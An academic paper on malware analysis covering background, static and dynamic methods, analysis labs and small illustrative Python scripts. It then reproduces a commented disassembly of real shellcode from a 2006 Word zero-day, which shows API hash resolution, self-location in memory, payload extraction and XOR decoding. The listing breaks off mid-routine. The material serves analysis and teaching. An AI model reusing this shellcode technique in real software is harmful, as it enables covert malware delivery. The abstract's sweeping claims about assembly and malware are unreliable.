
Malware Analysis Using Assembly Level Program

S. Murugan
ACTS Team Coordinator, CDAC Knowledge Park,
No. 1 Old Madras Road, Bangalore, Karnataka, INDIA
[email protected]

Dr. K. Kuppusamy, Associate Professor
Computer Science and Engg Dept, Alagappa University, Karaikudi,
Tamilnadu, INDIA
[email protected]

Abstract-Malware programs are exciting to experiment with. One advantage of using assembly language is that you can both create and combat such programs. Generally, all EFFECTIVE malware is written in assembly language. It would be difficult, if not impossible, to do this with other languages (except for C), although it is quite easy to write a self-reproducing program in any language. Viruses have been used to kill other viruses. One could conceive of viruses and worms that run through a system carrying out useful tasks without the direct intervention of particular users. The ability to forensically analyze malicious software is becoming an increasingly important discipline in the field of digital forensics. This is because malware is becoming stealthier, more targeted, profit driven, managed by criminal organizations, harder to detect and much harder to analyze. Malware analysis requires a considerable skill set to examine the internals of malware that is designed specifically to detect and hinder such attempts. A wide range of tools is available to the analyst, including debuggers, disassemblers, decompilers, memory dumpers and unpackers, as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and of the computers they execute on.

1. INTRODUCTION

Malware, short for malicious software, is software designed to infiltrate a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code. The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses.

Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of several U.S. states, including California and West Virginia. Malware is not the same as defective software, which is software that has a legitimate purpose but contains harmful bugs.

Preliminary results from Symantec published in 2008 suggested that "the release rate of malicious code and other unwanted programs may be exceeding that of legitimate software applications." According to F-Secure, "As much malware [was] produced in 2007 as in the previous 20 years altogether." Malware's most common pathway from criminals to users is through the Internet: primarily by e-mail and the World Wide Web.

The prevalence of malware as a vehicle for organized Internet crime, along with the general inability of traditional anti-malware protection platforms (products) to protect against the continuous stream of unique and newly produced malware, has seen the adoption of a new mindset for businesses operating on the Internet: the acknowledgment that some sizable percentage of Internet customers will always be infected for some reason or another, and that they need to continue doing business with infected customers. The result is a greater emphasis on back-office systems designed to spot fraudulent activities associated with advanced malware operating on customers' computers.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 1

IJAEST

On March 29, 2010, Symantec Corporation named Shaoxing, China as the world's malware capital.

Sometimes malware is disguised as genuine software, and it may even come from an official site. Therefore, some security programs, such as McAfee, may call malware "potentially unwanted programs" or "PUP".

Many early infectious programs, including the first Internet Worm and a number of MS-DOS viruses, were written as experiments or pranks. They were generally intended to be harmless or merely annoying, rather than to cause serious damage to computer systems. In some cases, the perpetrators did not realize how much harm their creations would do.

Young programmers learning about viruses and their techniques wrote them simply to show that they could, or to see how far the viruses would spread. As late as 1999, widespread viruses such as the Melissa virus appear to have been written chiefly as pranks.

Hostile intent related to vandalism can be found in programs designed to cause harm or data loss. Many DOS viruses, and the Windows ExploreZip worm, were designed to destroy files on a hard disk, or to corrupt the file system by writing invalid data to it. Network-borne worms such as the 2001 Code Red worm or the Ramen worm fall into the same category. Worms designed to vandalize web pages may seem like the online equivalent of graffiti tagging, with the author's alias or affinity group appearing everywhere the worm goes.

Another strictly for-profit category of malware has emerged in spyware: programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues to the spyware creator. Spyware programs do not spread like viruses; they are, in general, installed by exploiting security holes or are packaged with user-installed software, such as peer-to-peer applications.

The best-known types of malware, viruses and worms, are known for the manner in which they spread, rather than any other particular behavior. The term computer virus is used for a program that has infected some executable software and that, when run, causes the virus to spread to other executables. Viruses may also contain a payload that performs other actions, often malicious. A worm, on the other hand, is a program that actively transmits itself over a network to infect other computers. It too may carry a payload. These definitions lead to the observation that a virus requires user intervention to spread, whereas a worm spreads itself automatically. Using this distinction, infections transmitted by email or Microsoft Word documents, which rely on the recipient opening a file or email to infect the system, would be classified as viruses rather than worms.

Before Internet access became widespread, viruses spread on personal computers by infecting programs or the executable boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these executables, a virus causes itself to be run whenever a program is run or the disk is booted. Early computer viruses were written for the Apple II and Macintosh, but they became more widespread with the dominance of the IBM PC and MS-DOS. Executable-infecting viruses are dependent on users exchanging software or bootable floppies, so they spread rapidly in computer hobbyist circles.

The first worms, network-borne infectious programs, originated not on personal computers, but on multitasking UNIX systems. The first well-known worm was the Internet Worm of 1988, which infected SunOS and VAX BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process. This same behavior is used by today's worms as well.

With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code.

Today, worms are most commonly written for the Windows OS, although a few like Mare-D and the Lion worm are also written for Linux and UNIX systems. Worms today work in the same basic way as 1988's Internet Worm: they scan the network and leverage vulnerable computers to replicate. Because they need no human intervention, worms can spread with incredible speed.

2. INTRODUCTION

Malware has been defined as “software whose intent is malicious, or whose effect is malicious”. Analysis of malicious software is essential for computer security professionals and digital forensic analysts and is emerging as an important field of research. Malware is often targeted at organizations and increasingly uses anti-forensics techniques to prevent detection and analysis. Commercial Anti-Virus (AV) software is often limited in its ability to detect and remove malware. It is highly unlikely to detect new malware that has just been unleashed on the Internet or a corporate intranet, or malware that has been customized to target specific networks.

It is undeniable that there is a digital arms race between malware developers and malware researchers. As soon as a technique is developed by one side, the other side implements a countermeasure. Two of the major trends are that attackers are increasingly motivated by financial gain, and that malware development is becoming increasingly commercialized and carried out by professionals with extensive software engineering abilities. Another trend is that malware has an increasing variety of techniques available to hinder the forensic analyst. These can include detection of the tools used by the forensic analyst and prevention of analysis via anti-debugging, anti-disassembly, anti-emulation, anti-memory dumping, incorporation of fake signatures and code obfuscation.

Signature-based detection of malware depends on an analyst having already analyzed the malware and extracted a signature, and on the end user having updated their malware signature file.

Although these techniques go some way toward protecting a system, they are far from infallible and are only of minor assistance to the forensic analyst, especially if the malware is new or has been customized. The increasing availability of high-speed Internet connections has also enabled the rapid production and dissemination of malware. All of these factors are contributing to increasing numbers of network-borne malware with respect to volume, variety and complexity. Security professionals in the field need to know how to determine whether they are the target of an attack and how to eradicate or mitigate threats to their systems. This process of threat reduction can be assisted if security professionals have up-to-date methodologies and skill sets at their disposal.


3. THE PROBLEM WITH MALWARE ANALYSIS

The spectrum of malware that represents a real threat is expansive. A non-exhaustive list includes rootkits, worms, bots, trojans, logic bombs, viruses, phishing, spam, spyware, adware, key loggers and backdoors. No computing platform or environment is immune to these threats. Traditionally, malware is thought of as a virus or worm that has a single function or payload. The resulting countermeasure for traditional malware has been the employment of a removal tool that was triggered by signature detection or by recognition of heuristics defined by specific behaviors. These tools tended to be like the malware they were responding to in that they were unitary or singular in purpose.

Modern network-borne malware is increasingly multi-partite in nature, incorporating several infection vectors and possible payloads in the one instance. Signature-based systems that rely on file hashing or similar functions that uniquely identify malware based on file contents are increasingly failing due to the mass customization made possible by the use of frameworks. Furthermore, anti-forensic techniques are widely deployed to obfuscate infection, hinder detection and retard eventual removal of the malware. This increasing complexity and entropy makes modern malware analysis a significant undertaking that takes considerable time and expertise, and requires an extensive knowledge domain either in an individual or in the coverage provided by a team of analysts.
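The weakness of hash-based signatures can be illustrated with a minimal Python sketch. It is only an illustration under stated assumptions: the choice of SHA-256, the helper names sha256_hex and matches_signature, and the sample bytes are all hypothetical and do not come from any particular anti-malware product.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of a sample as a hex string."""
    return hashlib.sha256(data).hexdigest()


def matches_signature(sample: bytes, signature_db: set) -> bool:
    """Report whether the sample's hash is present in the signature set."""
    return sha256_hex(sample) in signature_db


# Hypothetical stand-in for a previously analyzed sample (not real malware).
known_sample = b"MZ" + b"\x90" * 64 + b"illustrative payload bytes"

# The signature file holds only hashes of samples an analyst has already seen.
signature_db = {sha256_hex(known_sample)}

# A customized variant needs to differ by only one byte to get a new hash.
customized_variant = known_sample + b"\x00"

print(matches_signature(known_sample, signature_db))        # True
print(matches_signature(customized_variant, signature_db))  # False
```

Because every customized build yields a different digest, a signature file built this way always lags behind the variants that a framework can generate.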

Two fundamental techniques available to the analyst are static and dynamic analysis. Static analysis does not execute the code; instead, the code is analyzed via disassemblies, call graphs, searches for strings and library calls, and reconstruction of the data structures, enumerations and unions within the code. This analysis technique is very time consuming and is easily hindered by anti-forensics in the form of code obfuscation, packers and protectors, which are increasingly being used by malware authors.
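One of the simplest static techniques mentioned above, searching a binary for strings, can be sketched in a few lines of Python. This is a rough approximation of what a strings utility does, not a replacement for one; the function name extract_strings, the minimum length of four characters and the sample buffer are assumptions chosen for the example.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII and UTF-16LE strings found in a byte buffer.

    The code is never executed; only its bytes are inspected.
    """
    # Runs of printable single-byte characters.
    ascii_pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # Runs of printable characters each followed by a zero byte (UTF-16LE).
    wide_pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)

    found = [m.group().decode("ascii") for m in ascii_pat.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_pat.finditer(data)]
    return found


# Hypothetical buffer mixing binary noise, an ASCII name and a wide-char path.
sample = (
    b"\x00\x01kernel32.dll\x00\xff"
    + "c:\\~.exe".encode("utf-16-le")
    + b"\x00\x00ab\x00"
)

for s in extract_strings(sample):
    print(s)
```

Packed or obfuscated samples typically yield few meaningful strings, which is one reason this technique is easily hindered.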

Dynamic analysis, in contrast, does run the code, and the analyst observes its behavior and its interaction with the host and network via mechanisms such as registry, file and network monitoring tools. This technique is generally much easier to conduct than static analysis but is also easily hindered by malware that can detect the use of an emulation environment such as VMware or the use of debugging tools such as IDA Pro. By detecting the use of these tools and environments, the malware can change its behavior. Once it detects them, the malware can decide not to run its true payload and can run in a deceptive mode that makes it look like much less of a threat. It can delete itself together with any evidence or, if it is running with the appropriate privileges, damage or destroy the system that it is being run on or attached to.

The analysis approach considered here uses an iterative and recursive technique that incorporates both static and dynamic analysis to extract the full functionality of the code, spiraling into the analysis from the higher-level view to the more detailed view. This technique also provides the opportunity to discover and mitigate anti-forensic techniques as the analysis process proceeds.

4. ANALYSIS PROCESS

A high-level and simplified view of the malware analysis process is depicted in figure 1 below. It shows malware as one of two inputs to the analysis methodology process, which produces a report as an output. The generated results also feed back into the analysis methodology via an assessment process, which can be used to adjust the methodology dynamically or as a process improvement mechanism. Legal and ethical constraints bound the process.


Programming skills are vital for in-depth analysis of malware. Systems-level programming, high-level languages, scripting and even assembly language programming are important skills required to understand how malware is implemented and how it takes advantage of vulnerabilities. They are also important for developing customized tools and for scripting disassemblers and debuggers. The power of being able to script debuggers and disassemblers should not be underestimated in a malware analysis context. Many analysis tools now also allow additional functionality to be added through customized Dynamic Link Library (DLL) plugins or through scripting languages such as IDAPython, which integrates IDA Pro scripting with the Python scripting language.

Producers of malware also develop and utilize advanced programming techniques and technologies, such as distributed computing, to gain a competitive advantage over detection software and techniques. Therefore, it is imperative that a malware analyst also be well versed in cutting-edge technologies and techniques.

5. MALWARE ANALYSIS

An adaptive, eclectic choice of techniques is required for the analysis of malware. Various methodologies, such as static and dynamic analysis, and frameworks, such as PaiMei, exist for the malware analyst. Static analysis is the examination of the code's logic and behaviors without running it, whereas dynamic analysis is the monitoring and observation of the code as it executes. Both techniques have strengths. Obfuscation of code may render static analysis ineffective. However, dynamic execution of that code segment may reveal the next code sections required for further static analysis. Other common software engineering techniques, such as profiling, tracing and debugging, are also applicable and useful in malware analysis. The diversity of malware modus operandi requires a range of approaches and techniques to perform successful dissection and analysis of the malware. The skills needed to perform competent analysis are profound, highly technical and at the cutting edge of computer science.

A wide range of tools is available to the analyst, including debuggers, disassemblers, decompilers, memory dumpers and unpackers, as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and of the computers they execute on. However, whether or not the tools are forensically sound and their use acceptable in a court of law is a matter that needs to be seriously considered.

Some useful tools are available from hacking and software cracking sites, but these would not be considered forensically sound without considerable validation or black box testing. Such tools could contain trojans and could easily hide a malicious purpose. They may not be forensically acceptable without significant due diligence on the part of the person or organization using them. Other software cracking or reverse engineering sites offer scripts for debuggers that can be easily and readily examined. These scripts are useful for extracting the known algorithm for dealing with a particular packer or for mitigating particular anti-forensic techniques used by the creators of such software.


Analysis of malware will typically require configuring a complete virtual environment suitable for it to run in, not only from an operating system perspective, but also including network infrastructure and services. Modern malware is increasingly network borne and network enabled, so it may be necessary to provide an environment in which the malware can use commonly used services such as a Domain Name System (DNS) server, a Simple Mail Transfer Protocol (SMTP) server or an Internet Relay Chat (IRC) server. Establishing this style of environment allows the malware to initiate communications with these services, so that the resulting traffic can be captured to assist in the dynamic analysis of the malware.
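As a rough illustration of such a lab service, the following Python sketch starts a TCP listener that records the first bytes any client sends to it. It is a simplified stand-in, not a real DNS, SMTP or IRC server; the names CaptureHandler and start_sink, the loopback address and the two-second timeout are assumptions made for the example, and it should only ever be run inside an isolated analysis network.

```python
import socket
import socketserver
import threading


class CaptureHandler(socketserver.BaseRequestHandler):
    """Record the first bytes a client sends, then close the connection."""

    def handle(self):
        self.request.settimeout(2.0)
        try:
            data = self.request.recv(4096)
        except socket.timeout:
            data = b""
        # Keep the peer address and payload for later inspection.
        self.server.captured.append((self.client_address[0], data))


def start_sink(host="127.0.0.1", port=0):
    """Start a capture service in a background thread and return the server.

    Port 0 asks the operating system for any free port; a lab setup would
    instead bind the port of the service being imitated.
    """
    server = socketserver.ThreadingTCPServer((host, port), CaptureHandler)
    server.captured = []
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
```

After start_sink() returns, server.server_address gives the bound address, server.captured accumulates (peer address, payload) tuples, and server.shutdown() followed by server.server_close() stops the service.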

This type of environment may be supported by commercial virtualization products such as VMware or Virtual PC.

It should be noted that because malware can detect these virtualized environments from their hardware and software fingerprints, the option of configuring real systems and devices may need serious consideration. This will require configuring a particular host computing environment or network device, or carrying out other system administration tasks. This type of environment would need strict control and isolation to prevent the spread of malware.

6. CODE

seg000:00000000 ;
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦
seg000:00000000 ; ¦ Copyright (c) 2006 by DataRescue sa/nv, <[email protected]> ¦
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ;
seg000:00000000 ; File Name : C:\Documents and Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded length: 246F5h
seg000:00000000 ;
seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
seg000:00000000 ;
seg000:00000000 ; This is a commented disassembly of the Word 0-day released in
seg000:00000000 ; mid-late May 2006. This document does not describe the vulnerability
seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
seg000:00000000
seg000:00000000
seg000:00000000 unicode macro page,string,zero
seg000:00000000     irpc c,<string>
seg000:00000000     db '&c', page
seg000:00000000     endm
seg000:00000000     ifnb <zero>
seg000:00000000     dw zero
seg000:00000000     endif
seg000:00000000 endm
seg000:00000000
seg000:00000000     .686p
seg000:00000000     .mmx
seg000:00000000     .model flat
seg000:00000000
seg000:00000000 ---------------------------------------------------------------------------
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This information will be
seg000:00000B2E ; used to locate the addresses of kernel32's exports (because they
seg000:00000B2E ; are offsets from the base address).
seg000:00000B2E
seg000:00000B2E     nop
seg000:00000B2F     nop


seg000:00000B30     mov     eax, fs:off_30      ; load PEB address into eax
seg000:00000B36     mov     eax, [eax+0Ch]      ; PEB->Ldr (loader data)
seg000:00000B39     mov     esi, [eax+1Ch]      ; first entry of InInitializationOrderModuleList
seg000:00000B3C     lodsd                       ; eax = next entry in the list
seg000:00000B3D     mov     esi, [eax+8]        ; kernel32.dll base address
seg000:00000B40     jmp     loc_DAF
seg000:00000B40
seg000:00000B40 ; At this point, the code jumps to loc_DAF, which immediately calls sub_B45.
seg000:00000B40 ; In doing so, the call instruction pushes its return address, 0x00000DB4
seg000:00000B40 ; (offset in this file), on the stack. Notably, the first
seg000:00000B40 ; instruction in sub_B45 is to pop this address into eax (see below)
seg000:00000B40
seg000:00000B45
seg000:00000B45 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000B45
seg000:00000B45
seg000:00000B45 ; The first part of this code loads the return address pushed by the call
seg000:00000B45 ; into the eax register. If you look at 0x00000DB4, there isn't much,
seg000:00000B45 ; but a dword (0A2000h) and three unicode strings of file names.
seg000:00000B45 ; The code uses the offset of these values from that address to reference
seg000:00000B45 ; them and builds a structure with pointers to them. The same structure
seg000:00000B45 ; will be used to store addresses of all the kernel32 exports later.
seg000:00000B45 ; In the code below, edi contains a pointer to the first member of the
seg000:00000B45 ; structure.
seg000:00000B45

seg000:00000B45 sub_B45 proc near               ; CODE XREF: seg000:loc_DAFp
seg000:00000B45     pop     eax
seg000:00000B46     sub     esp, 200h
seg000:00000B4C     mov     edi, esp
seg000:00000B4E     mov     ebx, [eax]          ; [eax] == 0A2000h
seg000:00000B50     mov     [edi+4], ebx
seg000:00000B53     mov     [edi+SCRATCH.hKernel32], esi ; base address of kernel32
seg000:00000B56     add     eax, 4
seg000:00000B59     mov     [edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C     add     eax, 0Ch
seg000:00000B5F     mov     [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B62     add     eax, 12h
seg000:00000B65     mov     [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B6B     push    edi                 ; saves the scratch pad for use within loc_BA1
seg000:00000B6C     mov     edi, esp
seg000:00000B6E     xor     edi, 0FFFFh
seg000:00000B74     dec     edi
seg000:00000B75     dec     edi
seg000:00000B76     dec     edi
seg000:00000B77
seg000:00000B77 ; The next instructions search memory for the original Word document's
seg000:00000B77 ; own filename. The last mov (above) places the esp pointer into edi.
seg000:00000B77 ; The loop works by reading a dword from edi and comparing it to the
seg000:00000B77 ; unicode equivalent of "oc". If it matches then it begins to search
seg000:00000B77 ; for ".d" (which completes the ".doc" extension). Otherwise,
seg000:00000B77 ; it decrements edi and grabs another dword. When done, it jumps
seg000:00000B77 ; to loc_BA1.
seg000:00000B77
seg000:00000B77 loc_B77:                        ; CODE XREF: sub_B45+39j
seg000:00000B77                                 ; sub_B45+45j ...
seg000:00000B77     dec     edi
seg000:00000B78     cmp     dword ptr [edi], 63006Fh ; "oc"
seg000:00000B7E     jnz     short loc_B77
seg000:00000B80     dec     edi
seg000:00000B81     dec     edi
seg000:00000B82     dec     edi
seg000:00000B83     dec     edi
seg000:00000B84     cmp     dword ptr [edi], 64002Eh ; ".d"
seg000:00000B8A     jnz     short loc_B77
seg000:00000B8C     push    0C8h
seg000:00000B91     pop     ecx
seg000:00000B92     mov     esi, edi
seg000:00000B94
seg000:00000B94 loc_B94:                        ; CODE XREF: sub_B45+58j
seg000:00000B94     dec     esi
seg000:00000B95     cmp     dword ptr [esi], 5C003Ah ; ":\"


seg000:00000B9B     jz      short loc_BA1       ; finished - jump to loc_BA1
seg000:00000B9D     loop    loc_B94
seg000:00000B9F     jmp     short loc_B77       ; failed - start over again from loc_B77
seg000:00000BA1 ; ---------------------------------------------------------------------------
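The dword constants compared in the search loop above (63006Fh, 64002Eh and 5C003Ah) are simply pairs of UTF-16LE characters read as little-endian integers. The following Python sketch is an illustration added for clarity, not part of the original disassembly. It reproduces those constants and loosely mirrors the backward search on an ordinary byte buffer. The function names utf16_dword, dword_at and find_doc_path and the sample buffer are assumptions made for the example; the 0C8h step limit is taken from the listing.

```python
import struct


def utf16_dword(two_chars: str) -> int:
    """Return the little-endian dword formed by two UTF-16LE characters."""
    raw = two_chars.encode("utf-16-le")
    if len(raw) != 4:
        raise ValueError("expected exactly two 16-bit characters")
    return struct.unpack("<I", raw)[0]


def dword_at(buf: bytes, pos: int) -> int:
    """Read a little-endian dword from buf at byte offset pos."""
    return struct.unpack_from("<I", buf, pos)[0]


def find_doc_path(buf: bytes, max_back: int = 0xC8) -> int:
    """Scan backwards for a wide-char '.doc' and then for the preceding ':\\'.

    Returns the offset of the drive letter, or -1 if nothing is found.
    """
    oc, dot_d, colon_bs = utf16_dword("oc"), utf16_dword(".d"), utf16_dword(":\\")
    pos = len(buf) - 4
    while pos >= 4:
        # "oc" at pos with ".d" four bytes earlier spells ".doc".
        if dword_at(buf, pos) == oc and dword_at(buf, pos - 4) == dot_d:
            ext = pos - 4
            # Walk back at most max_back bytes looking for ":\".
            for back in range(1, max_back + 1):
                start = ext - back
                if start < 2:
                    break
                if dword_at(buf, start) == colon_bs:
                    return start - 2  # two bytes earlier is the drive letter
        pos -= 1
    return -1


print(hex(utf16_dword("oc")))   # 0x63006f
print(hex(utf16_dword(".d")))   # 0x64002e
print(hex(utf16_dword(":\\")))  # 0x5c003a

# Hypothetical memory image containing a wide-character document path.
memory = b"\x00" * 10 + "C:\\a.doc".encode("utf-16-le") + b"\x00" * 6
start = find_doc_path(memory)
print(memory[start:start + 16].decode("utf-16-le"))  # C:\a.doc
```

The sketch checks both halves of the extension in one test, whereas the shellcode restarts its scan when the second comparison fails; the values compared are the same.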

seg000:00000BA1

seg000:00000BA1 ; This is the section that fills the shellcode's own structure

seg000:00000BA1 ; members with pointers to kernel32 exports. Once again, edi contains

seg000:00000BA1 ; the pointer to the structure's first member, so all [edi+xyz] are

seg000:00000BA1 ; references to the additional members. Each step pushes two

seg000:00000BA1 ; parameters on the stack: the base address of kernel32.dll and a

seg000:00000BA1 ; dword hash of the function name (probably hashed to obfuscate the

seg000:00000BA1 ; functions it imports). It then calls resolve_func for the actual

seg000:00000BA1 ; work (see 0x00000D5B of this file). When complete, the code knows

seg000:00000BA1 ; exactly where to find all the system resources and functions it needs.

seg000:00000BA1 ;

seg000:00000BA1 ; Note that the xyz fields in the [edi+xyz] operands are plain numeric

seg000:00000BA1 ; offsets in the raw disassembly. My co-worker Ryan reversed the

seg000:00000BA1 ; resolve_func subroutine and renamed them for readability.

seg000:00000BA1

seg000:00000BA1

seg000:00000BA1 loc_BA1: ; CODE XREF: sub_B45+56j

seg000:00000BA1 dec esi

seg000:00000BA2 dec esi

seg000:00000BA3 pop edi

seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME], esi

seg000:00000BA7 push [edi+SCRATCH.hKernel32]

seg000:00000BAA push 0C0397ECh ; GlobalAlloc

seg000:00000BAF call resolve_func

seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax

seg000:00000BB7 push [edi+SCRATCH.hKernel32]

seg000:00000BBA push 7CB922F6h ; GlobalFree

seg000:00000BBF call resolve_func

seg000:00000BC4 mov [edi+SCRATCH.pGlobalFree], eax

seg000:00000BC7 push dword ptr [edi+8]

seg000:00000BCA push 7C0017BBh ; CreateFileW

seg000:00000BCF call resolve_func

seg000:00000BD4 mov [edi+SCRATCH.pCreateFileW], eax

seg000:00000BD7 push dword ptr [edi+8]

seg000:00000BDA push 0FFD97FBh ; CloseHandle

seg000:00000BDF call resolve_func

seg000:00000BE4 mov [edi+SCRATCH.pCloseHandle], eax

seg000:00000BE7 push dword ptr [edi+8]

seg000:00000BEA push 10FA6516h ; ReadFile

seg000:00000BEF call resolve_func

seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax

seg000:00000BF7 push dword ptr [edi+8]

seg000:00000BFA push 0E80A791Fh ; WriteFile

seg000:00000BFF call resolve_func

seg000:00000C04 mov [edi+SCRATCH.pWriteFile], eax

seg000:00000C07 push dword ptr [edi+8]

seg000:00000C0A push 0C2FFB03Bh ; DeleteFileW

seg000:00000C0F call resolve_func

seg000:00000C14 mov [edi+SCRATCH.pDeleteFileW], eax

seg000:00000C17 push dword ptr [edi+8]

seg000:00000C1A push 76DA08ACh ; SetFilePointer

seg000:00000C1F call resolve_func

seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax

seg000:00000C27 push dword ptr [edi+8]

seg000:00000C2A push 0E8AFE98h ; WinExec

seg000:00000C2F call resolve_func

seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax

seg000:00000C37 push dword ptr [edi+8]

seg000:00000C3A push 99EC8974h ; CopyFileW

seg000:00000C3F call resolve_func

seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax

seg000:00000C47 push dword ptr [edi+8]

seg000:00000C4A push 73E2D87Eh ; ExitProcess

seg000:00000C4F call resolve_func

seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax

seg000:00000C54

seg000:00000C54 ; Delete any previously existing files of the same name. Recall these are

seg000:00000C54 ; two of the three unicode file names discussed earlier.

seg000:00000C54

seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe

seg000:00000C5A call [edi+SCRATCH.pDeleteFileW]

seg000:00000C5D push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C60 call [edi+SCRATCH.pDeleteFileW]

seg000:00000C63

seg000:00000C63 ; The next 3 push instructions are preparing the arguments for CopyFile.

seg000:00000C63 ; Top down, they are 0 (for overwriting permission), destination

seg000:00000C63 ; file name, and source file name (derived by the code's memory searching

seg000:00000C63 ; technique).

seg000:00000C63

seg000:00000C63 push 0

seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME]

seg000:00000C6B call [edi+SCRATCH.pCopyFileW]

seg000:00000C6E

seg000:00000C6E ; The next 7 push instructions are preparing the arguments for CreateFile.

seg000:00000C6E ; Despite the function name, this only opens an already existing file (in

seg000:00000C6E ; particular an exact copy of the original Word document now at c:\~$ after

seg000:00000C6E ; CopyFile).

seg000:00000C6E

seg000:00000C6E push 0

seg000:00000C70 push 80h

seg000:00000C75 push 3

seg000:00000C77 push 0

seg000:00000C79 push 0

seg000:00000C7B push 80000000h

seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C83 call [edi+SCRATCH.pCreateFileW]

seg000:00000C86

seg000:00000C86 ; This is where it gets a little interesting. The code places its read

seg000:00000C86 ; pointer at EOF and moves -4 bytes (back toward the beginning). The dword

seg000:00000C86 ; stored there is the size of the embedded output file, which also tells

seg000:00000C86 ; the code how far back from EOF that file begins. It reads the dword into

seg000:00000C86 ; field_4, allocates that much storage on the heap, then moves the read

seg000:00000C86 ; pointer to -(field_4 + 4) bytes from EOF and reads field_4 bytes into the

seg000:00000C86 ; new buffer. Once it has collected all the data, it proceeds to loc_CEA

seg000:00000C86 ; for processing.

seg000:00000C86

seg000:00000C86 mov [edi+SCRATCH.hInputFile], eax

seg000:00000C89 push FILE_END

seg000:00000C8B push 0

seg000:00000C8D push -4

seg000:00000C8F push [edi+SCRATCH.hInputFile]

seg000:00000C92 call [edi+SCRATCH.pSetFilePointer]

seg000:00000C95 push 0

seg000:00000C97 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000C9D push ebx

seg000:00000C9E push 4

seg000:00000CA0 lea ebx, [edi+SCRATCH.field_4]

seg000:00000CA3 push ebx

seg000:00000CA4 push [edi+SCRATCH.hInputFile] ; handle to c:\~$

seg000:00000CA7 call [edi+SCRATCH.pReadFile]

seg000:00000CAA push [edi+SCRATCH.field_4]

seg000:00000CAD push 40h ; '@' ; uFlags = 40h (GPTR); the size is field_4, pushed above

seg000:00000CAF call [edi+SCRATCH.pGlobalAlloc]

seg000:00000CB2 mov [edi+SCRATCH.pMallocdBuff0], eax

seg000:00000CB5 mov ebx, [edi+SCRATCH.field_4]

seg000:00000CB8 add ebx, 4

seg000:00000CBB not ebx

seg000:00000CBD inc ebx ; not + inc negates: ebx = -(field_4 + 4)

seg000:00000CBE push 2 ; FILE_END again, with the new offset

seg000:00000CC0 push 0

seg000:00000CC2 push ebx

seg000:00000CC3 push [edi+SCRATCH.hInputFile]

seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]

seg000:00000CC9 push 0

seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]

seg000:00000CD1 push ebx

seg000:00000CD2 push [edi+SCRATCH.field_4]

seg000:00000CD5 push [edi+SCRATCH.pMallocdBuff0]

seg000:00000CD8 push [edi+SCRATCH.hInputFile]

seg000:00000CDB call [edi+SCRATCH.pReadFile]

seg000:00000CDE push [edi+SCRATCH.hInputFile]

seg000:00000CE1 call [edi+SCRATCH.pCloseHandle]

seg000:00000CE4 mov eax, [edi+SCRATCH.field_4]

seg000:00000CE7 mov ebx, [edi+SCRATCH.pMallocdBuff0]

seg000:00000CEA

seg000:00000CEA ; This section of code loops through all bytes in the buffer filled by the

seg000:00000CEA ; previous ReadFile() call and xor's them with 0x81. In the instructions,

seg000:00000CEA ; ebx points at the current byte and eax is the counter. This xor-encoding

seg000:00000CEA ; scheme obfuscates the code and could help evade IDS detection in

seg000:00000CEA ; some cases.

seg000:00000CEA

seg000:00000CEA loc_CEA: ; CODE XREF: sub_B45+1ADj

